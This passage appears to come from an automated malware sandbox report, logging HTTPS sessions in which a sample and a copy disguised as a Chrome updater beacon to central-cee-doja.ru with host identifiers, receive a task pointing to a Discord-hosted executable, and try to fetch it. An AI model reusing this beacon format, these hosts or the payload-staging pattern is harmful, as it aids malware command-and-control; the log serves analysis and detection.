                                                                                    2024-01-04 07:31:57 UTC203INData Raw: 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: -8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    272192.168.2.649998104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:59 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:32:00 UTC574INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:32:00 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bFb3wjfZLfhszqpo7Q0J3zefrA1dTznw3IcK4xcl3HcLVZ3QIN4ciz%2Bfk8Hojt7SPYPDS3Up1mGMawggbKO1V%2Ba9FmKqjE37kya1rUwixaIo9gVQp71fS8FDe1QBqLSLsRn1bb6W"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8f9bb800a17-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:32:00 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:32:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    273192.168.2.649999104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:59 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:32:00 UTC582INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:32:00 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=np%2FwdEVO6KybVEgYi2ZtMc%2FahMzNz2fcd0%2BNpwX%2B5OamGbhC4cvsFvy8HUYtS3Ftcx0Xo3%2FppNMd6k1SfzhxW6MMf3jX9i23XhXzFGNS3FkFY1wdwO3OPuHfTsLa2dow%2BF82zKZv"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8f9db075943-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:32:00 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:32:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    274192.168.2.650000104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:32:00 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:32:00 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:32:00 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qX3h%2BmaKFTUpXmCL1UnljrNz13dOYYy5MX3%2B4uT7R5k0fIWG8kEMGm%2BjGZN3Q1XWyIFyhqloVnE8MkxiNHSlkqdW2ovD3tHTKonqLEdrDxoeiQEsh3O6R7DxdJiM71wYLgvNkWS6"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8ff5dd381a5-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:32:00 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:32:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    275192.168.2.650001104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:32:00 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:32:00 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:32:00 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7BT2FeZ%2FKjp8SLhpSM6QoKhjn0Zb23SJSspqS7xYQKuupI%2BSWVgk4fpD66sCQlRbSpUcydDtxZdO%2FZcNXgI8zMK5e8fRLzU7PuGSennKpd%2B9EEXUZAW%2FB3u0qV1%2Ba327MaNjqquY"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8ff6b6459fe-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:32:00 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:32:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    276192.168.2.650002162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:32:01 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:32:01 UTC1338INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:32:01 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c90398f43b05-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 105
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:32:01 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=safXEvY4faCtURwEi47VCNm_DKs3i91JEwr4gsIY504-1704353521-1-AeUPjLoYcUb+SqxacO4eAYjdxYkt/oG8s+67OKRoq8E4ZF52G7SGcEEFeS5ktpVenl7wtZlnCGaFmzCc/bhBifk=; path=/; expires=Thu, 04-Jan-24 08:02:01 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jZpdWOsYg%2BHNg8lm1BhZpkA7WV7Fxmxbp9DI36CR3C5TwCqLNRjoTBzeuV4T6wQLGiz6hq2cv33pS4OARZSy7pQiLJ%2BCGESP1tmUNe%2FWk5bkEJarTPrFj%2FxuK%2FLPJV0NWD1rlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=ZwR.dMvUVtInVIzGVeX4tZlzTVlQXjbXtlvjdZrS_Ck-1704353521234-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:32:01 UTC31INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55
                                                                                    Data Ascii: <?xml version='1.0' encoding='U
                                                                                    2024-01-04 07:32:01 UTC205INData Raw: 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: TF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    277192.168.2.650003162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:32:01 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:32:01 UTC1343INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:32:01 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c903ac972078-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 103
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:32:01 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=nmi8nVZ0Lb6_jr9DU2dhz4nXdD8uq25umKWJEbVISmQ-1704353521-1-Abq6tCYEmMEejYhSYbDzHj5zGyyhmEHVV+iLtbigPV15A2y9T7zukS+8/lQrRF/wRA8GxSnneww6Q8rBz6sOolc=; path=/; expires=Thu, 04-Jan-24 08:02:01 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QBccw4L%2F8KrZYdo0k9ZGqUhfDstVQqPRTXCgI5hOyqQcZvunN%2B16mPOgv15iZ%2FfYhMTGWFJc4BslnD8b2PcURKq3pZcZHeBG6o9mL1XRoXCA8%2Fhcu639WTNpWdj211io4zJxVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=J_UxgM.d8guruwoSOOFje7KcHgE7X9TQKOSt2OICB9U-1704353521253-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:32:01 UTC26INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69
                                                                                    Data Ascii: <?xml version='1.0' encodi
                                                                                    2024-01-04 07:32:01 UTC210INData Raw: 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ng='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    278192.168.2.650004104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:32:07 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:32:07 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:32:07 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q3XyGYuRVx8qVHJ2FHxF4WWLU1bC7aroGs5PIAGrSgELtMjTnHf0a5F3a%2BvPeBU7q05J5dhFfxB5OldI%2B%2BvT%2FSfOGLa4JVgVhRwXDtAUlC37qAICf%2Fp5NofJzONpiSNIORmDGoZ7"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c9282aac8024-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:32:07 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:32:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    279192.168.2.650006104.21.89.193443
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:32:07 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:32:08 UTC597INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:32:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jWB41uOKGU7UyfAbPg9603X447%2FuMiqF7hhKTP%2BAn4D4VvF4zj74lX3CuawJxPpd6pV6ZfjfuSOH5iD1lfjHfNnEYwZfyJTsgIZeEbDEFy8j6jBeuFgFrKKMdtNqOtAGwfZyn3l7"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c92c8c822072-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:32:08 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:32:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    280192.168.2.650005104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:32:07 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:32:08 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:32:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xbWdIW8rs12mzFnuCy%2FjIOW0arNrcQ3TfGOfU73wrDJqExiD5949jMegx8StpMWLxDeER%2BS0BrkOSjzgzZbG8O5uE7gY0rAov%2B6JeHxyN%2BcmyPsjlOX9mczVIdaP64mMG3xlvhvI"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c92c9f133b74-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:32:08 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:32:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    281192.168.2.650007104.21.89.193443
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:32:08 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:32:08 UTC607INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:32:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nXuHDA5z2PU5Eq%2FX80EFnKdeTQom4bDX4TF0E2puSECi%2BfVV2yvwGEvTSU02xUchwnw%2F5qdF%2FW7EiDKYZ3dOF5vKGfeo8Om6i3%2Fu5WuFfC%2Br71sP26HB93SRFoHdRAfrK9%2BeYvdn"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c930ed8e5836-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:32:08 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:32:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    282192.168.2.650008162.159.129.233443
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:32:08 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:32:08 UTC1347INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:32:08 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c931fc4f82ce-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 101
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:32:08 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=Yu.4zg534LBTjR.dw9Wf0zmzHoZ4k.QOdsHQ3_HqQVU-1704353528-1-Af+IOh1c6Qiu/sN0q0Mwzmjh6NdButtJzwtaSKSU613QA++GV7R23+qYf0NLjzXDsw/lv5Nz6Qcyc3NYgRbKYa0=; path=/; expires=Thu, 04-Jan-24 08:02:08 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VDnm%2BN1v0sBvK1nOjBi8%2BpyY%2FrIgB5PwyAKS%2FUR3q8WdyvH2uqgopSpVn9AHl82PPtRuTZOV3CHIHggkKIql0lo1AiDVFiq7XNMF5z40v05QVQUiVBCU0NfAEf%2B6UwbycO%2Bv5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=2_SHL5TuQEkZM.moo6UQh1r4wQ7_kY6oCIoau_DAkKg-1704353528676-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:32:08 UTC22INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e
                                                                                    Data Ascii: <?xml version='1.0' en
                                                                                    2024-01-04 07:32:08 UTC214INData Raw: 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: coding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    283192.168.2.650009162.159.129.233443
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:32:08 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:32:09 UTC1330INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:32:09 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c9351a23390b-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 104
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:32:09 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
